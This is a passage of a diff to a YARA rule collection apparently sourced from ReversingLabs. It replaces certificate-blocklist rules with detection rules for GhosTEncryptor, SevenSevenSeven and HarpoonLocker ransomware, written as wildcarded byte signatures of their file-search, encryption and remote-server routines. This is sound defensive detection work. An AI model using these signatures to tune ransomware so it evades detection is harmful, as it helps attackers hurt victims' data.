24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 84 + 24 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 44 24 ?? + 48 89 5C 24 ?? 48 89 4C 24 ?? 66 90 E8 + } + $kill_procs_p1 = { + 4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC + 24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 + 89 5C 24 ?? 31 C9 66 90 EB ?? 48 8B 54 24 ?? 48 8D 4A ?? 48 8B 84 24 ?? ?? ?? ?? 48 + 8B 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 39 CB 0F 8E ?? ?? ?? ?? 48 89 4C 24 ?? 48 C1 + E1 ?? 48 8B 1C 08 48 89 5C 24 ?? 48 8B 4C 08 ?? 48 89 4C 24 ?? 48 8B 73 ?? 48 89 C8 + FF D6 48 89 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48 + 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 48 + 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B + 3D ?? ?? ?? ?? 48 89 C3 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 + 89 08 48 8D BC 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 48 A5 48 8D BC + 24 ?? ?? ?? ?? 48 8D 7F ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? + 48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + EB ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8D 84 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 48 85 C9 0F 84 ?? ?? ?? + ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 12 48 89 54 24 ?? 48 8B 01 48 89 44 24 ?? 48 8B 59 + ?? 48 89 5C 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 31 F6 EB ?? 48 8B 94 24 ?? ?? ?? ?? 48 83 + } + $kill_procs_p2 = { + C2 ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 89 CE 48 89 D1 48 89 74 24 ?? 48 89 8C 24 ?? + ?? ?? ?? 48 8B 11 48 89 54 24 ?? 48 8B 79 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C + 24 ?? 48 8B 7C 24 ?? 90 E8 ?? ?? ?? ?? 48 85 C0 0F 8C ?? ?? ?? ?? 48 8B 44 24 ?? BB + ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 DE 31 C0 48 8D 1D ?? ?? ?? + ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 44 0F 11 39 48 8D 94 24 ?? ?? ?? ?? 44 0F + 11 3A 48 8D 15 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? + ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? + ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 44 0F 11 BC 24 ?? ?? ?? ?? + 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 1D ?? ?? + ?? ?? BF ?? ?? ?? ?? 48 89 FE 48 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 48 8B 44 24 ?? 90 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ?? + ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? E8 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Cigam Software Corporativo LTDA" and pe.signatures[i].serial=="03:9e:5d:0e:32:97:f5:74:db:99:e1:d9:50:38:53:d9" and 1378079999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($kill_procs_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Bc32Bbe5Bbb4F06F490C50651Cd5Da50 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostencryptor : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects GhosTEncryptor ransomware." author = "ReversingLabs" - id = "eb6ccc6d-2a66-5113-8b78-c32012431123" - date = "2023-11-08" - modified = "2023-11-08" + id = "9f035e39-e0fe-54f3-8206-08fbbd9206b4" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2842-L2860" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "104be481b7d4b1cb3c43c72314afc3641983838b5177c34a88d6da0d0e7b89c9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.GhosTEncryptor.yara#L1-L69" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "85c1f6e5acf746388b0a9ddeb1f0ad1d2219fff7358c9a981849863155c13e3c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "GhosTEncryptor" + tc_detection_factor = 5 importance = 25 + strings: + $enum_folders = { + 17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 03 28 ?? ?? ?? ?? 0B 16 0C 38 ?? ?? ?? ?? + 07 08 9A 0D 02 09 28 ?? ?? ?? ?? 2C ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? + ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? + ?? ?? 2D ?? 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 02 7B ?? ?? ?? ?? 09 72 ?? ?? ?? + ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 09 28 ?? ?? ?? ?? 26 08 17 58 0C 08 07 8E 69 3F ?? + ?? ?? ?? 02 7B ?? ?? ?? ?? 06 17 6F ?? ?? ?? ?? 2A + } + $encrypt_folder_p1 = { + 1F ?? 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? + ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 72 + ?? ?? ?? ?? A2 25 1D 72 ?? ?? ?? ?? A2 25 1E 72 ?? ?? ?? ?? A2 25 1F ?? 72 ?? ?? ?? ?? + A2 25 1F ?? 72 ?? ?? ?? ?? A2 25 1F ?? 72 + } + $encrypt_folder_p2 = { + A2 0A 03 28 ?? ?? ?? ?? 0B 03 28 ?? ?? ?? ?? 0C 16 0D 2B ?? 07 09 9A 28 ?? ?? ?? ?? 13 + ?? 06 11 ?? 28 ?? ?? ?? ?? 2C ?? 02 07 09 9A 04 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69 + 32 ?? 16 13 ?? 2B ?? 02 08 11 ?? 9A 04 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 + 32 ?? 2A + } + $deep_search_p1 = { + 17 8D ?? ?? ?? ?? 0A 06 16 72 ?? ?? ?? ?? A2 7E ?? ?? ?? ?? 0B 02 0C 16 0D 38 ?? ?? ?? + ?? 08 09 9A 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 72 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? + ?? ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 11 ?? 72 + } + $deep_search_p2 = { + 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F + ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 07 11 ?? 72 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 0B 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 09 17 58 0D 09 08 8E + 69 3F ?? ?? ?? ?? 07 06 17 6F ?? ?? ?? ?? 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Remedica Medical Education and Publishing Ltd" and (pe.signatures[i].serial=="00:bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50" or pe.signatures[i].serial=="bc:32:bb:e5:bb:b4:f0:6f:49:0c:50:65:1c:d5:da:50") and 1387151999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_folders) and ( all of ($deep_search_p*)) and ( all of ($encrypt_folder_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_3E1656Dfcaacfed7C2D2564355698Aa3 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Sevensevenseven : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects SevenSevenSeven ransomware." author = "ReversingLabs" - id = "57b75eaa-2cb2-5713-8eb3-065f90a1fdd5" - date = "2023-11-08" - modified = "2023-11-08" + id = "049531bd-9505-5da1-9512-980383c8c5ec" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2862-L2878" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ba7cca8d71f571644cabd3d491cddefffd05ca7a838f262a343a01e4a09bb72a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.SevenSevenSeven.yara#L1-L148" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "583a8ac746cd749bd3927f10c864a3ac84f82f8bbd8d0ebf117e22b016d7ca94" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "SevenSevenSeven" + tc_detection_factor = 5 importance = 25 + strings: + $file_search_p1 = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? + ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 45 ?? 53 56 57 89 65 ?? BE ?? ?? ?? ?? 89 75 + ?? 33 DB 89 5D ?? 88 5D ?? 89 75 ?? 89 5D ?? 88 5D ?? 89 75 ?? 88 5D ?? 68 ?? ?? ?? + ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 53 50 8D 4D ?? E8 + ?? ?? ?? ?? BF ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? + ?? 83 C4 ?? 39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 8D 8D ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? + ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 90 6A ?? 53 8D + 4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 8D 8D ?? ?? ?? + ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? + 53 50 8D 4D ?? E8 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? 39 BD ?? ?? ?? + ?? 72 ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 B5 ?? ?? ?? ?? 89 9D ?? ?? + ?? ?? 88 9D ?? ?? ?? ?? 39 7D ?? 8B 75 ?? 73 ?? 8D 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? + ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 + } + $file_search_p2 = { + 74 ?? B8 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 3B + C3 0F 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 + ?? 8B 45 ?? 3A C3 0F 84 ?? ?? ?? ?? 50 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 3B + F3 0F 84 ?? ?? ?? ?? 39 7D ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 7D ?? 72 + ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 88 5D ?? 39 7D + ?? 0F 82 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 E9 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 38 1E 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? + ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF + 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 89 5D ?? + 39 7D ?? 8B 45 ?? 73 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? EB + ?? B8 ?? ?? ?? ?? C3 + } + $encrypt_file_1 = { + 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ?? + 33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41 + 3B C8 72 ?? 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? + ?? ?? ?? C3 57 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B + F8 83 FF ?? 75 ?? 5F 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? + ?? C3 53 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 57 FF 15 ?? ?? ?? ?? 5B 5F + 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 53 6A ?? FF 15 + ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 57 8B F0 FF 15 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 53 56 + 57 FF 15 ?? ?? ?? ?? 33 C0 85 DB 76 ?? 8D 49 ?? 80 34 30 ?? 40 3B C3 72 ?? 6A ?? 6A + ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 53 56 57 FF 15 ?? ?? ?? ?? 57 FF + 15 ?? ?? ?? ?? 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 0F B7 44 24 ?? 0F B7 4C 24 ?? 0F B7 + 54 24 ?? 68 ?? ?? ?? ?? 50 0F B7 44 24 ?? 51 0F B7 4C 24 ?? 52 0F B7 54 24 ?? 50 51 + 52 55 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 52 55 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8B + 8C 24 ?? ?? ?? ?? 5B 5F 5E B8 ?? ?? ?? ?? 5D E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $encrypt_file_2 = { + 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 55 8B AC 24 ?? ?? ?? ?? 56 55 89 84 24 ?? ?? ?? ?? + 33 F6 FF 15 ?? ?? ?? ?? 33 C9 85 C0 76 ?? 8D 9B ?? ?? ?? ?? 80 3C 29 ?? 75 ?? 46 41 + 3B C8 72 ?? 83 FE ?? 74 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 55 FF 15 ?? + ?? ?? ?? 8B F0 83 FE ?? 75 ?? 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 + ?? ?? ?? ?? C3 53 6A ?? 56 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 73 ?? 56 FF 15 ?? ?? ?? + ?? 5B 5E 33 C0 5D 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 57 8D 83 + ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8B F8 FF 15 ?? ?? ?? ?? + 6A ?? 8D 4C 24 ?? 51 53 57 56 FF 15 ?? ?? ?? ?? 8B CB C1 E9 ?? 41 74 ?? 8D 47 ?? B2 + ?? 80 70 ?? ?? 80 70 ?? ?? 80 30 ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ?? 80 70 ?? ?? + 30 50 ?? 83 C0 ?? 49 75 ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 54 24 ?? + 52 53 57 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? + 0F B7 4C 24 ?? 0F B7 54 24 ?? 0F B7 44 24 ?? 68 ?? ?? ?? ?? 51 0F B7 4C 24 ?? 52 0F + B7 54 24 ?? 50 0F B7 44 24 ?? 51 52 50 55 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? + ?? ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15 + ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5B 5E B8 ?? ?? ?? ?? 5D E8 + ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $remote_server_1 = { + 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 55 56 57 68 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 33 FF 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB + BD ?? ?? ?? ?? 8B 44 24 ?? BA ?? ?? ?? ?? 8B CB D3 E2 85 D0 0F 84 ?? ?? ?? ?? 8A CB + 8D 54 24 ?? 80 C1 ?? 52 88 4C 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 44 + 24 ?? 50 FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D + 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 8D 4C 24 ?? 51 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54 + 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 44 24 ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ?? + ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? + ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 33 C0 5B E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 + } + $remote_server_2 = { + 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 57 33 FF 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 89 84 + 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 66 83 7C 24 ?? ?? + 0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 87 ?? ?? ?? ?? 53 55 56 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? + 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? + ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 89 44 24 ?? 33 DB BD ?? ?? + ?? ?? 8B CB B8 ?? ?? ?? ?? D3 E0 8B 4C 24 ?? 85 C1 0F 84 ?? ?? ?? ?? 8A D3 8D 44 24 + ?? 80 C2 ?? 50 88 54 24 ?? 66 C7 44 24 ?? ?? ?? FF D6 83 F8 ?? 74 ?? 8D 4C 24 ?? 51 + FF D6 83 F8 ?? 75 ?? 8D 44 24 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 8D 50 ?? 8A + 08 40 84 C9 75 ?? 2B C2 50 8D 54 24 ?? 52 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 44 24 ?? 6A + ?? 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 83 F8 ?? 72 ?? 8B 4C 24 ?? 51 E8 ?? ?? ?? + ?? 83 C4 ?? 89 6C 24 ?? 89 7C 24 ?? C6 44 24 ?? ?? 43 83 FB ?? 0F 8C ?? ?? ?? ?? E8 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B + 8C 24 ?? ?? ?? ?? 5E 5D 5B 33 C0 5F E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C2 ?? ?? 57 FF + 15 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "John W.Richard" and pe.signatures[i].serial=="3e:16:56:df:ca:ac:fe:d7:c2:d2:56:43:55:69:8a:a3" and 1385251199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($file_search_p*)) and ((($encrypt_file_1) and ($remote_server_1)) or (($encrypt_file_2) and ($remote_server_2))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4Bf1D68E926E2Dd8966008C44F95Ea1C : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Harpoonlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects HarpoonLocker ransomware." author = "ReversingLabs" - id = "c82170a4-911c-5206-bae8-6503a5449df9" - date = "2023-11-08" - modified = "2023-11-08" + id = "3605d354-5a33-54b1-83ad-ad514c78357b" + date = "2022-01-27" + modified = "2022-01-27" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L2880-L2896" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "44b5aae8380e3590ebb6e2365e89b3827432e8330e5290dc8f8603a00bcf62f6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.HarpoonLocker.yara#L1-L96" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "20587f9dce5981934498d9979843a090224ba649def8b694adf7799b7060cc25" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "HarpoonLocker" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? + ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 6F + ?? ?? ?? ?? 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 25 06 07 9A 7D + ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ?? 26 07 17 58 0B 07 06 8E + 69 32 ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 73 ?? ?? ?? ?? 0D + 09 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? + 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? + ?? 26 12 ?? 28 ?? ?? ?? ?? 